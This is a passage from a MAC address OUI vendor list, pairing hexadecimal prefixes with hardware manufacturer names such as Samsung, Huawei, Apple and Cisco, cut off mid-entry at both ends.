co.,Ltd E8C57A Ufispace Co., LTD. A0CF5B Cisco Systems, Inc 002421 MICRO-STAR INT'L CO., LTD. 0060D1 CASCADE COMMUNICATIONS 805E4F FN-LINK TECHNOLOGY LIMITED 8C8126 ARCOM D47C44 IEEE Registration Authority 8C6D77 HUAWEI TECHNOLOGIES CO.,LTD 3856B5 Peerbridge Health Inc 14579F HUAWEI TECHNOLOGIES CO.,LTD B44326 HUAWEI TECHNOLOGIES CO.,LTD 000C42 Routerboard.com 0026BD JTEC Card & Communication Co., Ltd 04AB18 ELECOM CO.,LTD. 302432 Intel Corporate 24F57E HWH CO., LTD. D0C5D8 LATECOERE 7054B4 Vestel Elektronik San ve Tic. A.S. 20A60C Xiaomi Communications Co Ltd 505967 Intent Solutions Inc 1866C7 Shenzhen Libre Technology Co., Ltd 5CB3F6 Human, Incorporated 2C4835 IEEE Registration Authority 482AE3 Wistron InfoComm(Kunshan)Co.,Ltd. 74C14F HUAWEI TECHNOLOGIES CO.,LTD B0EB57 HUAWEI TECHNOLOGIES CO.,LTD 000680 Card Access, Inc. 488AD2 MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. DCE838 CK Telecom (Shenzhen) Limited A8D498 Avira Operations GmbH & Co. KG 709FA9 TECNO MOBILE LIMITED 0C01DB Infinix mobility limited 08C5E1 SAMSUNG ELECTRO-MECHANICS(THAILAND) 841766 WEIFANG GOERTEK ELECTRONICS CO.,LTD 2C4D79 WEIFANG GOERTEK ELECTRONICS CO.,LTD FCA6CD Fiberhome Telecommunication Technologies Co.,LTD 1869DA China Mobile Group Device Co.,Ltd. A85B6C Robert Bosch Gmbh, CM-CI2 44C874 China Mobile Group Device Co.,Ltd. 78D294 NETGEAR 60D02C Ruckus Wireless D058FC SKY UK LIMITED 3C576C Samsung Electronics Co.,Ltd C8B1EE Qorvo 00FCBA Cisco Systems, Inc 00CBB4 SHENZHEN ATEKO PHOTOELECTRICITY CO.,LTD 4CC00A vivo Mobile Communication Co., Ltd. 9CE82B vivo Mobile Communication Co., Ltd. 7079B3 Cisco Systems, Inc 149B2F JiangSu ZhongXie Intelligent Technology co., LTD ECAF97 GIT 48DD9D ITEL MOBILE LIMITED A075EA BoxLock, Inc. F04CD5 Maxlinear, Inc 9C7F57 UNIC Memory Technology Co Ltd B4E01D CONCEPTION ELECTRONIQUE 1C0042 NARI Technology Co., Ltd. 701D08 99IOT Shenzhen co.,ltd F85C4D Nokia 2C584F ARRIS Group, Inc. E4EA83 SHENZHEN GONGJIN ELECTRONICS CO.,LT 74EC42 Fiberhome Telecommunication Technologies Co.,LTD D4FC13 Fiberhome Telecommunication Technologies Co.,LTD 3835FB Sagemcom Broadband SAS 0001AE Trex Enterprises 00E009 Stratus Technologies 001027 L-3 COMMUNICATIONS EAST 589B0B Shineway Technologies, Inc. D8160A Nippon Electro-Sensory Devices 10C07C Blu-ray Disc Association E4B021 Samsung Electronics Co.,Ltd 7412BB Fiberhome Telecommunication Technologies Co.,LTD E0BAB4 Arrcus, Inc 807D3A Espressif Inc. A0B045 Halong Mining 242E02 HUAWEI TECHNOLOGIES CO.,LTD 78B6EC Scuf Gaming International LLC 8035C1 Xiaomi Communications Co Ltd 2047DA Xiaomi Communications Co Ltd 781D4A zte corporation BC2643 Elprotronic Inc. 04E229 Qingdao Haier Technology Co.,Ltd 4434A7 ARRIS Group, Inc. 3CE1A1 Universal Global Scientific Industrial Co., Ltd. F898EF HUAWEI TECHNOLOGIES CO.,LTD 58F987 HUAWEI TECHNOLOGIES CO.,LTD A8F5AC HUAWEI TECHNOLOGIES CO.,LTD 28AC9E Cisco Systems, Inc 08DFCB Systrome Networks A4933F HUAWEI TECHNOLOGIES CO.,LTD 00BE3B HUAWEI TECHNOLOGIES CO.,LTD 7CA177 HUAWEI TECHNOLOGIES CO.,LTD 34E894 TP-LINK TECHNOLOGIES CO.,LTD. 58BAD4 HUAWEI TECHNOLOGIES CO.,LTD 68CAE4 Cisco Systems, Inc 348B75 LAVA INTERNATIONAL(H.K) LIMITED 9CE895 New H3C Technologies Co., Ltd 00583F PC Aquarius 903D68 G-Printec, Inc. 1094BB Apple, Inc. 88E9FE Apple, Inc. 38892C Apple, Inc. 749EAF Apple, Inc. 94BF2D Apple, Inc. F86FC1 Apple, Inc. 28FF3C Apple, Inc. F099B6 Apple, Inc. 90834B BEIJING YUNYI TIMES TECHNOLOGY CO,.LTD 18502A SOARNEX A433D7 MitraStar Technology Corp. B0ACD2 zte corporation 200F70 FOXTECH 58B3FC SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 68D482 SHENZHEN GONGJIN ELECTRONICS CO.,LT 984562 Shanghai Baud Data Communication Co.,Ltd. 007147 Amazon Technologies Inc. 00BE75 Cisco Systems, Inc C048E6 Samsung Electronics Co.,Ltd 882E5A storONE 788C54 Ping Communication E4C483 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 001FBA Boyoung Tech 202D23 Collinear Networks Inc. 2429FE KYOCERA Corporation 7C49EB XIAOMI Electronics,CO.,LTD C43306 China Mobile Group Device Co.,Ltd. A8367A frogblue TECHNOLOGY GmbH 6CE4DA NEC Platforms, Ltd. 10E7C6 Hewlett Packard 1831BF ASUSTek COMPUTER INC. 04C241 Nokia 80CE62 Hewlett Packard 801F12 Microchip Technology Inc. 506CBE InnosiliconTechnology Ltd C8FAE1 ARQ Digital LLC DCA333 Shenzhen YOUHUA Technology Co., Ltd 78257A LEO Innovation Lab 10A4B9 Baidu Online Network Technology (Beijing) Co., Ltd 0C5415 Intel Corporate B8AF67 Hewlett Packard C098DA China Mobile IOT Company Limited F00FEC HUAWEI TECHNOLOGIES CO.,LTD AC075F HUAWEI TECHNOLOGIES CO.,LTD 3C479B Theissen Training Systems, Inc. 606BFF Nintendo Co.,Ltd 8CF710 AMPAK Technology, Inc. 307BAC New H3C Technologies Co., Ltd 3C0461 ARRIS Group, Inc. 785DC8 LG Electronics E8C1B8 Nanjing Bangzhong Electronic Commerce Limited D8D775 Sagemcom Broadband SAS E8330D Xaptec GmbH B4A8B9 Cisco Systems, Inc 50DCE7 Amazon Technologies Inc. A816D0 Samsung Electronics Co.,Ltd A46CF1 Samsung Electronics Co.,Ltd 08AED6 Samsung Electronics Co.,Ltd CC4D38 Carnegie Technologies 40CBC0 Apple, Inc. C4618B Apple, Inc. 08E689 Apple, Inc. DC56E7 Apple, Inc. D460E3 Sercomm Corporation. 247E12 Cisco Systems, Inc 501CB0 Cisco Systems, Inc 04AC44 Holtek Semiconductor Inc. F4DCA5 DAWON DNS 649829 Integrated Device Technology (Malaysia) Sdn. Bhd. 081DC4 Thermo Fisher Scientific Messtechnik GmbH 785364 SHIFT GmbH 883D24 Google, Inc. 38E60A Xiaomi Communications Co Ltd 4064A4 THE FURUKAWA ELECTRIC CO., LTD 00C0FF Seagate Cloud Systems Inc D45DDF PEGATRON CORPORATION F065C2 Yanfeng Visteon Electronics Technology (Shanghai) Co.,Ltd. 70B7E2 Jiangsu Miter Technology Co.,Ltd. 005D73 Cisco Systems, Inc 606D3C Luxshare Precision Industry Company Limited 002790 Cisco Systems, Inc DCBFE9 Motorola Mobility LLC, a Lenovo Company B42D56 Extreme Networks, Inc. CC6EA4 Samsung Electronics Co.,Ltd 5C5F67 Intel Corporate 803A59 AT&T 588D64 Xi'an Clevbee Technology Co.,Ltd 88D171 BEGHELLI S.P.A 80B708 Blue Danube Systems, Inc 808DB7 Hewlett Packard Enterprise A825EB Cambridge Industries(Group) Co.,Ltd. 34E380 Genexis B.V. 5C5819 Jingsheng Technology Co., Ltd. B8CA04 Holtek Semiconductor Inc. 34BA38 PAL MOHAN ELECTRONICS PVT LTD 9829A6 COMPAL INFORMATION (KUNSHAN) CO., LTD. A09D86 Alcatel-Lucent Shanghai Bell Co., Ltd F8B568 IEEE Registration Authority 2C6B7D Texas Instruments C4C563 TECNO MOBILE LIMITED 6CB2AE Cisco Systems, Inc B0982B Sagemcom Broadband SAS 34FA9F Ruckus Wireless A09DC1 China Dragon Technology Limited 2C4205 Lytx C8D12A Comtrend Corporation 08BC20 Hangzhou Royal Cloud Technology Co., Ltd 942A3F Diversey Inc 2031EB HDSN F8C96C Fiberhome Telecommunication Technologies Co.,LTD 844823 WOXTER TECHNOLOGY Co. Ltd E078A3 Shanghai Winner Information Technology Co.,Inc BCF292 PLANTRONICS, INC. 0450DA Qiku Internet Network Scientific (Shenzhen) Co., Ltd E820E2 HUMAX Co., Ltd. F41E5E RtBrick Inc. 6C7660 KYOCERA CORPORATION 002102 UpdateLogic Inc. 505800 WyTec International, Inc. 1890D8 Sagemcom Broadband SAS 88835D FN-LINK TECHNOLOGY LIMITED F81D0F Hitron Technologies. Inc 0CEAC9 ARRIS Group, Inc. 10A4BE SHENZHEN BILIAN ELECTRONIC CO.,LTD 947BBE Ubicquia LLC ECC06A PowerChord Group Limited 944996 WiSilica Inc 8C5BF0 ARRIS Group, Inc. F06E0B Microsoft Corporation 346FED Enovation Controls 68A682 Shenzhen YOUHUA Technology Co., Ltd 000589 National Datacomputer 3CA616 vivo Mobile Communication Co., Ltd. 78870D Unifiedgateways India Private Limited 0005A7 HYPERCHIP Inc. 0026A8 DAEHAP HYPER-TECH 785C28 Prime Motion Inc. EC9F0D IEEE Registration Authority 088466 Novartis Pharma AG 309FFB Ardomus Networks Corporation 649A08 Shenzhen SuperElectron Technology Co.,LTD 001530 Dell EMC 0CB2B7 Texas Instruments 587A62 Texas Instruments 547A52 CTE International srl 24F677 Apple, Inc. B0CA68 Apple, Inc. C83C85 Apple, Inc. 5433CB Apple, Inc. 3408BC Apple, Inc. 1C36BB Apple, Inc. 3C2EFF Apple, Inc. 00E025 dit Co., Ltd. 408BF6 Shenzhen TCL New Technology Co., Ltd 00006B Silicon Graphics 84E327 TAILYN TECHNOLOGIES INC 0021B8 Inphi Corporation 0C9160 Hui Zhou Gaoshengda Technology Co.,LTD D8ED1C Magna Technology SL D83134 Roku, Inc A88200 Hisense Electric Co.,Ltd 3820A8 ColorTokens, Inc. 705896 InShow Technology 00B69F Latch A0648F ASKEY COMPUTER CORP C850E9 Raisecom Technology CO., LTD F46E24 NEC Personal Computers, Ltd. 888279 Shenzhen RB-LINK Intelligent Technology Co.Ltd 68C63A Espressif Inc. 74373B UNINET Co.,Ltd. 7C6456 Samsung Electronics Co.,Ltd 10F163 TNK CO.,LTD 88DA1A Redpine Signals, Inc. 98EF9B OHSUNG 98C5DB Ericsson AB 842C80 Sichuan Changhong Electric Ltd. 3CC079 Shenzhen One-Nine Intelligent Electronic Science and Technology Co., Ltd 24F27F Hewlett Packard Enterprise BC0543 AVM GmbH B430C0 York Instruments Ltd E81DA8 Ruckus Wireless 5C8D2D Shanghai Wellpay Information Technology Co., Ltd 90FD9F Silicon Laboratories 9CE063 Samsung Electronics Co.,Ltd D03169 Samsung Electronics Co.,Ltd 149F3C Samsung Electronics Co.,Ltd FCEEE6 FORMIKE ELECTRONIC CO., LTD 947EB9 National Narrowband Network Communications Pty Ltd F03D03 TECNO MOBILE LIMITED DCF090 Nubia Technology Co.,Ltd. CC5A53 Cisco Systems, Inc 00C0EE KYOCERA Display Corporation 14CF8D OHSUNG 104400 HUAWEI TECHNOLOGIES CO.,LTD B0E17E HUAWEI TECHNOLOGIES CO.,LTD E4A7C5 HUAWEI TECHNOLOGIES CO.,LTD A0FE61 Vivint Wireless Inc. 5C2BF5 Vivint Wireless Inc. 245FDF KYOCERA CORPORATION 9C63ED zte corporation 74F661 Schneider Electric Fire & Security Oy 2C279E IEEE Registration Authority 8C5F48 Continental Intelligent Transportation Systems LLC 2CB21A Phicomm (Shanghai) Co., Ltd. 00289F Semptian Co., Ltd. 646E69 Liteon Technology Corporation 706BB9 Cisco Systems, Inc 006088 Analog Devices, Inc. 084ACF GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD D4389C Sony Corporation 001439 Blonder Tongue Laboratories, Inc 104E89 Garmin International D8C497 Quanta Computer Inc. E470B8 Intel Corporate 20A6CD Hewlett Packard Enterprise 64B5C6 Nintendo Co.,Ltd 2830AC Frontiir Co. Ltd. D4D2E5 BKAV Corporation 0050B5 FICHET SECURITE ELECTRONIQUE 001987 Panasonic Mobile Communications Co.,Ltd. BCC342 Panasonic Communications Co., Ltd. 001BD3 Panasonic Corporation AVC Networks Company CC7EE7 Panasonic Corporation AVC Networks Company 20C6EB Panasonic Corporation AVC Networks Company 0015AB PRO CO SOUND INC 5876C5 DIGI I'S LTD C84029 Fiberhome Telecommunication Technologies Co.,LTD F86EEE HUAWEI TECHNOLOGIES CO.,LTD 741C27 ITEL MOBILE LIMITED 84802D Cisco Systems, Inc 00188D Nokia Danmark A/S 00DB70 Apple, Inc. B8634D Apple, Inc. 24C42F Philips Lifeline A4E975 Apple, Inc. 3035AD Apple, Inc. 844167 Apple, Inc. 9800C6 Apple, Inc. AC1F74 Apple, Inc. A85C2C Apple, Inc. 9C305B Hon Hai Precision Ind. Co.,Ltd. FCE557 Nokia Corporation 48C58D Lear Corporation GmbH 4C49E3 Xiaomi Communications Co Ltd 28D436 Jiangsu dewosi electric co., LTD D4B27A ARRIS Group, Inc. 00869C Palo Alto Networks 94D9B3 TP-LINK TECHNOLOGIES CO.,LTD. 00A0AC GILAT SATELLITE NETWORKS, LTD. 002609 Phyllis Co., Ltd. 28F537 IEEE Registration Authority F83441 Intel Corporate 44EA4B Actlas Inc. C4CB6B Airista Flow, Inc. 188090 Cisco Systems, Inc 7802B1 Cisco Systems, Inc B40F3B Tenda Technology Co.,Ltd.Dongguan branch A8B2DA FUJITSU LIMITED 78D800 IEEE Registration Authority 0835B2 CoreEdge Networks Co., Ltd 786256 HUAWEI TECHNOLOGIES CO.,LTD B05508 HUAWEI TECHNOLOGIES CO.,LTD 54666C Shenzhen YOUHUA Technology Co., Ltd A89675 Motorola Mobility LLC, a Lenovo Company B4C170 Yi chip Microelectronics (Hangzhou) Co., Ltd 001F41 Ruckus Wireless 842096 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. B875C0 PayPal, Inc. 001C71 Emergent Electronics 001A93 ERCO Leuchten GmbH 94F665 Ruckus Wireless 389AF6 Samsung Electronics Co.,Ltd E0AA96 Samsung Electronics Co.,Ltd 507705 Samsung Electronics Co.,Ltd 245880 VIZEO B090D4 Shenzhen Hoin Internet Technology Co., Ltd 8C9F3B Qingdao Hisense Communications Co.,Ltd. 0014B8 Hill-Rom ACED5C Intel Corporate 70DF2F Cisco Systems, Inc C4108A Ruckus Wireless F0B052 Ruckus Wireless AC6706 Ruckus Wireless 044FAA Ruckus Wireless 589396 Ruckus Wireless 9061AE Intel Corporate 50184C Platina Systems Inc. F4B7B3 vivo Mobile Communication Co., Ltd. 6CF9D2 CHENGDU POVODO ELECTRONIC TECHNOLOGY CO., LTD F46BEF Sagemcom Broadband SAS 08306B Palo Alto Networks 3894E0 Syrotech Networks. Ltd. 34F64B Intel Corporate 10CDB6 Essential Products, Inc. 30B62D Mojo Networks, Inc. 60271C VIDEOR E. Hartig GmbH 0018AE TVT CO.,LTD 8891DD Racktivity 1C4593 Texas Instruments 90EC50 C.O.B.O. SPA CC03D9 Cisco Meraki FCA667 Amazon Technologies Inc. 00EC0A Xiaomi Communications Co Ltd C81FEA Avaya Inc A4F3E7 Integrated Device Technology (Malaysia) Sdn. Bhd. E43A6E Shenzhen Zeroone Technology CO.,LTD C087EB Samsung Electronics Co.,Ltd C8D7B0 Samsung Electronics Co.,Ltd DCC8F5 Shanghai UMEinfo CO.,LTD. 88D7F6 ASUSTek COMPUTER INC. D0F88C Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 2CB115 Integrated Device Technology (Malaysia) Sdn. Bhd. 10D07A AMPAK Technology, Inc. 447BBB Shenzhen YOUHUA Technology Co., Ltd 9097F3 Samsung Electronics Co.,Ltd 7C1C68 Samsung Electronics Co.,Ltd 881544 Cisco Meraki 002449 Shen Zhen Lite Star Electronics Technology Co., Ltd 04714B IEEE Registration Authority 00E18C Intel Corporate 847933 profichip GmbH 74DADA D-Link International D8F1F0 Pepxim International Limited 9C7BD2 NEOLAB Convergence 6C60EB ZHI YUAN ELECTRONICS CO., LIMITED 2C41A1 Bose Corporation 4C38D8 ARRIS Group, Inc. 6045CB ASUSTek COMPUTER INC. E442A6 Intel Corporate 3C678C HUAWEI TECHNOLOGIES CO.,LTD 28A6DB HUAWEI TECHNOLOGIES CO.,LTD 14A0F8 HUAWEI TECHNOLOGIES CO.,LTD C8F86D Alcatel-Lucent Shanghai Bell Co., Ltd 44B412 SIUS AG 0CB912 JM-DATA GmbH 3CA308 Texas Instruments C4ABB2 vivo Mobile Communication Co., Ltd. F43E61 SHENZHEN GONGJIN ELECTRONICS CO.,LT B4417A SHENZHEN GONGJIN ELECTRONICS CO.,LT D4503F GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 388C50 LG Electronics DC0856 Alcatel-Lucent Enterprise D47DFC TECNO MOBILE LIMITED 409F38 AzureWave Technology Inc. 000631 Calix Inc. 4095BD NTmore.Co.,Ltd E8C1D7 Philips 4C8120 Taicang T&W Electronics 00118B Alcatel-Lucent Enterprise 00E0B1 Alcatel-Lucent Enterprise 00E0DA Alcatel-Lucent Enterprise F8BE0D A2UICT Co.,Ltd. 00143F Hotway Technology Corporation F8FF0B Electronic Technology Inc. 00D318 SPG Controls D055B2 Integrated Device Technology (Malaysia) Sdn. Bhd. 144FD7 IEEE Registration Authority B85510 Zioncom Electronics (Shenzhen) Ltd. 98AAFC IEEE Registration Authority 1CDA27 vivo Mobile Communication Co., Ltd. 90F305 HUMAX Co., Ltd. 049573 zte corporation F0D7AA Motorola Mobility LLC, a Lenovo Company 3096FB Samsung Electronics Co.,Ltd 4827EA Samsung Electronics Co.,Ltd 7C787E Samsung Electronics Co.,Ltd 7C6BF7 NTI co., ltd. 70F087 Apple, Inc. 245BA7 Apple, Inc. D4CF37 Symbolic IO 6091F3 vivo Mobile Communication Co., Ltd. 28395E Samsung Electronics Co.,Ltd 38295A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 40B034 Hewlett Packard 3034D2 Availink, Inc. 504061 Nokia 00108E HUGH SYMONS CONCEPT Technologies Ltd. B816DB CHANT SINCERE CO.,LTD E05163 Arcadyan Corporation 54E3F6 Alcatel-Lucent 000C46 Allied Telesyn Inc. 001F72 QingDao Hiphone Technology Co,.Ltd 002365 Insta Elektro GmbH 40FA7F Preh Car Connect GmbH 407D0F HUAWEI TECHNOLOGIES CO.,LTD 68CC6E HUAWEI TECHNOLOGIES CO.,LTD 40B4CD Amazon Technologies Inc. F42B48 Ubiqam 2C7E81 ARRIS Group, Inc. 88E628 Shenzhen Kezhonglong Optoelectronic Technology Co.,Ltd 50F14A Texas Instruments CC82EB KYOCERA CORPORATION BC2F3D vivo Mobile Communication Co., Ltd. 6854FD Amazon Technologies Inc. 78C1A7 zte corporation 4C7872 Cav. Uff. Giacomo Cimberio S.p.A. A084CB SonicSensory,Inc. 641A22 Heliospectra AB 8CF5A3 SAMSUNG ELECTRO-MECHANICS(THAILAND) 083E5D Sagemcom Broadband SAS 8CC8F4 IEEE Registration Authority F483E1 Shanghai Clouder Semiconductor Co.,Ltd 540384 Hongkong Nano IC Technologies Co., Ltd 04DEF2 Shenzhen ECOM Technology Co. Ltd D47AE2 Samsung Electronics Co.,Ltd 3CBD3E Beijing Xiaomi Electronics Co., Ltd. 0003BC COT GmbH 7C1015 Brilliant Home Technology, Inc. CCB8A8 AMPAK Technology, Inc. 34049E IEEE Registration Authority E44790 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 38454C Light Labs, Inc. 74614B Chongqing Huijiatong Information Technology Co., Ltd. 98D293 Google, Inc. F49651 NAKAYO Inc 446246 Comat AG 34FCB9 Hewlett Packard Enterprise E02202 ARRIS Group, Inc. D825B0 Rockeetech Systems Co.,Ltd. B0702D Apple, Inc. D8E0E1 Samsung Electronics Co.,Ltd 00A0C8 Adtran Inc D8C771 HUAWEI TECHNOLOGIES CO.,LTD D4B169 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 70918F Weber-Stephen Products LLC 94FB29 Zebra Technologies Inc. 00204F DEUTSCHE AEROSPACE AG 00DBDF Intel Corporate 94A04E Bostex Technology Co., LTD FC10C6 Taicang T&W Electronics A84041 Dragino Technology Co., Limited 1077B0 Fiberhome Telecommunication Technologies Co.,LTD F01DBC Microsoft Corporation 0C8DDB Cisco Meraki 80D4A5 HUAWEI TECHNOLOGIES CO.,LTD 04B0E7 HUAWEI TECHNOLOGIES CO.,LTD 446A2E HUAWEI TECHNOLOGIES CO.,LTD A06FAA LG Innotek 0026AB Seiko Epson Corporation 6C19C0 Apple, Inc. E02A82 Universal Global Scientific Industrial Co., Ltd. B0F963 Hangzhou H3C Technologies Co., Limited D490E0 Topcon Electronics GmbH & Co. KG F83F51 Samsung Electronics Co.,Ltd 50D753 CONELCOM GmbH B0EE7B Roku, Inc AC587B JCT Healthcare 1062EB D-Link International 000894 InnoVISION Multimedia Ltd. B47447 CoreOS 8CE117 zte corporation 688AF0 zte corporation C0210D SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 4CE2F1 Udino srl 504B5B CONTROLtronic GmbH 000B4F Verifone 60C798 Verifone C8662C Beijing Haitai Fangyuan High Technology Co,.Ltd. 8096CA Hon Hai Precision Ind. Co.,Ltd. 186571 Top Victory Electronics (Taiwan) Co., Ltd. 2C6FC9 Hon Hai Precision Ind. Co.,Ltd. B4B384 ShenZhen Figigantic Electronic Co.,Ltd 7828CA Sonos, Inc. A0CC2B Murata Manufacturing Co., Ltd. 00C003 GLOBALNET COMMUNICATIONS 00234A Private 2C402B Smart iBlue Technology Limited 5C6B4F Hello Inc. D058A8 zte corporation D071C4 zte corporation 34D270 Amazon Technologies Inc. 0CC47A Super Micro Computer, Inc. 58EF68 Belkin International Inc. 5001D9 HUAWEI TECHNOLOGIES CO.,LTD 24C44A zte corporation 98541B Intel Corporate 007B18 SENTRY Co., LTD. 144D67 Zioncom Electronics (Shenzhen) Ltd. 4CE173 IEEE Registration Authority 0023D2 Inhand Electronics, Inc. 00271C MERCURY CORPORATION E0D9E3 Eltex Enterprise Ltd. 0CD86C SHENZHEN FAST TECHNOLOGIES CO.,LTD DC0B34 LG Electronics (Mobile Communications) 049790 Lartech telecom LLC 28EED3 Shenzhen Super D Technology Co., Ltd 1C40E8 SHENZHEN PROGRESS&WIN TECHNOLOGY CO.,LTD 404E36 HTC Corporation 50795B Interexport Telecomunicaciones S.A. 0016D9 NINGBO BIRD CO.,LTD. 6CA7FA YOUNGBO ENGINEERING INC. 8C7EB3 Lytro, Inc. 805EC0 YEALINK(XIAMEN) NETWORK TECHNOLOGY CO.,LTD. 2C9924 ARRIS Group, Inc. 60A4D0 Samsung Electronics Co.,Ltd 008701 Samsung Electronics Co.,Ltd 5C9960 Samsung Electronics Co.,Ltd 245CBF NCSE 9C62AB Sumavision Technologies Co.,Ltd 188B15 ShenZhen ZhongRuiJing Technology co.,LTD 0060D6 NovAtel Inc. 503AA0 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. B0958E TP-LINK TECHNOLOGIES CO.,LTD. C025E9 TP-LINK TECHNOLOGIES CO.,LTD. 886B0F Bluegiga Technologies OY AC84C9 Sagemcom Broadband SAS 487B6B HUAWEI TECHNOLOGIES CO.,LTD 2C3361 Apple, Inc. A8E705 Fiberhome Telecommunication Technologies Co.,LTD A46011 Verifone 240D65 Shenzhen Vsun Communication Technology Co., Ltd. 883FD3 HUAWEI TECHNOLOGIES CO.,LTD 000B14 ViewSonic Corporation C8028F Nova Electronics (Shanghai) Co., Ltd. C8F946 LOCOSYS Technology Inc. 00137E CorEdge Networks, Inc. D814D6 SURE SYSTEM Co Ltd 6CEFC6 SHENZHEN TWOWING TECHNOLOGIES CO.,LTD. 101DC0 Samsung Electronics Co.,Ltd 407C7D Nokia 24590B White Sky Inc. Limited 143365 TEM Mobile Limited 5CA933 Luma Home 002341 Vanderbilt International (SWE) AB 78471D Samsung Electronics Co.,Ltd A07591 Samsung Electronics Co.,Ltd 0CDFA4 Samsung Electronics Co.,Ltd 68EBAE Samsung Electronics Co.,Ltd 444E1A Samsung Electronics Co.,Ltd B072BF Murata Manufacturing Co., Ltd. BC8556 Hon Hai Precision Ind. Co.,Ltd. 342387 Hon Hai Precision Ind. Co.,Ltd. 64DAA0 Robert Bosch Smart Home GmbH 14B837 Shenzhen YOUHUA Technology Co., Ltd B8EE65 Liteon Technology Corporation 985BB0 KMDATA INC. 0011FF Digitro Tecnologia Ltda 001B94 T.E.M.A. S.p.A. 50B7C3 Samsung Electronics Co.,Ltd 1C5A3E Samsung Electronics Co.,Ltd A02195 Samsung Electronics Co.,Ltd B07870 Wi-NEXT, Inc. 0017D5 Samsung Electronics Co.,Ltd 001E7D Samsung Electronics Co.,Ltd 001DF6 Samsung Electronics Co.,Ltd 701DC4 NorthStar Battery Company, LLC 5C8613 Beijing Zhoenet Technology Co., Ltd CC7314 HONG KONG WHEATEK TECHNOLOGY LIMITED 5CA39D SAMSUNG ELECTRO MECHANICS CO., LTD. 90187C SAMSUNG ELECTRO MECHANICS CO., LTD. 50CCF8 SAMSUNG ELECTRO MECHANICS CO., LTD. 002637 SAMSUNG ELECTRO MECHANICS CO., LTD. 002119 SAMSUNG ELECTRO MECHANICS CO., LTD. F4D9FB Samsung Electronics Co.,Ltd 3C6200 Samsung Electronics Co.,Ltd E47CF9 Samsung Electronics Co.,Ltd 4844F7 Samsung Electronics Co.,Ltd 001377 Samsung Electronics Co.,Ltd 002454 Samsung Electronics Co.,Ltd E81132 Samsung Electronics Co.,Ltd F07BCB Hon Hai Precision Ind. Co.,Ltd. C417FE Hon Hai Precision Ind. Co.,Ltd. 9439E5 Hon Hai Precision Ind. Co.,Ltd. 642737 Hon Hai Precision Ind. Co.,Ltd. A41731 Hon Hai Precision Ind. Co.,Ltd. E006E6 Hon Hai Precision Ind. Co.,Ltd. 00223B Communication Networks, LLC C0F8DA Hon Hai Precision Ind. Co.,Ltd. F0F002 Hon Hai Precision Ind. Co.,Ltd. C0CB38 Hon Hai Precision Ind. Co.,Ltd. 001D25 Samsung Electronics Co.,Ltd E4C1F1 SHENZHEN SPOTMAU INFORMATION TECHNOLIGY CO., Ltd 240AC4 Espressif Inc. 18D276 HUAWEI TECHNOLOGIES CO.,LTD F0038C AzureWave Technology Inc. AC3613 Samsung Electronics Co.,Ltd BC8CCD SAMSUNG ELECTRO-MECHANICS(THAILAND) D022BE SAMSUNG ELECTRO-MECHANICS(THAILAND) EC9BF3 SAMSUNG ELECTRO-MECHANICS(THAILAND) F409D8 SAMSUNG ELECTRO-MECHANICS(THAILAND) 343111 Samsung Electronics Co.,Ltd 08FD0E Samsung Electronics Co.,Ltd 041BBA Samsung Electronics Co.,Ltd 889B39 Samsung Electronics Co.,Ltd E432CB Samsung Electronics Co.,Ltd 10D542 Samsung Electronics Co.,Ltd A0821F Samsung Electronics Co.,Ltd F06BCA Samsung Electronics Co.,Ltd 94350A Samsung Electronics Co.,Ltd C06599 Samsung Electronics Co.,Ltd BC79AD Samsung Electronics Co.,Ltd 4C3C16 Samsung Electronics Co.,Ltd 0073E0 Samsung Electronics Co.,Ltd 002611 Licera AB 005218 Wuxi Keboda Electron Co.Ltd F0E77E Samsung Electronics Co.,Ltd F008F1 Samsung Electronics Co.,Ltd 58C38B Samsung Electronics Co.,Ltd 005094 ARRIS Group, Inc. E0B7B1 ARRIS Group, Inc. D82522 ARRIS Group, Inc. 00E3B2 Samsung Electronics Co.,Ltd 301966 Samsung Electronics Co.,Ltd 7C0623 Ultra Electronics Sonar System Division 00126C Visonic Technologies 1993 Ltd. 84EF18 Intel Corporate A81B6A Texas Instruments 985DAD Texas Instruments D43639 Texas Instruments BC282C e-Smart Systems Pvt. Ltd A40DBC Xiamen Intretech Inc. 001E81 CNB Technology Inc. 7CA97D Objenious A8A648 Qingdao Hisense Communications Co.,Ltd. B0F893 Shanghai MXCHIP Information Technology Co., Ltd. 28AC67 Mach Power, Rappresentanze Internazionali s.r.l. 641269 ARRIS Group, Inc. 0002C9 Mellanox Technologies, Inc. 14825B Hefei Radio Communication Technology Co., Ltd AC6175 HUAWEI TECHNOLOGIES CO.,LTD 244427 HUAWEI TECHNOLOGIES CO.,LTD 48FD8E HUAWEI TECHNOLOGIES CO.,LTD 343DC4 BUFFALO.INC 28C87A ARRIS Group, Inc. C411E0 Bull Group Co., Ltd 10E878 Nokia FCB0C4 Shanghai DareGlobal Technologies Co.,Ltd A89DD2 Shanghai DareGlobal Technologies Co.,Ltd 00E00F Shanghai Baud Data Communication Co.,Ltd. 28BE03 TCT mobile ltd 0080C7 XIRCOM 000138 XAVi Technologies Corp. 00166D Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 3C9157 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 0000D8 Novell, Inc. 001F46 Nortel Networks 003093 Sonnet Technologies, Inc 080051 ExperData 002561 ProCurve Networking by HP 008058 PRINTER SYSTEMS CORP. 00157D POSDATA 4849C7 Samsung Electronics Co.,Ltd 849866 Samsung Electronics Co.,Ltd 00034B Nortel Networks 000E40 Nortel Networks 001C9C Nortel Networks 001B25 Nortel Networks 0019E1 Nortel Networks 1880F5 Alcatel-Lucent Shanghai Bell Co., Ltd 001D42 Nortel Networks 00140D Nortel Networks 903AE6 PARROT SA A098ED Shandong Intelligent Optical Communication Development Co., Ltd. 000EF4 Kasda Networks Inc 00167A Skyworth Overseas Development Ltd. A42940 Shenzhen YOUHUA Technology Co., Ltd E4A387 Control Solutions LLC 002280 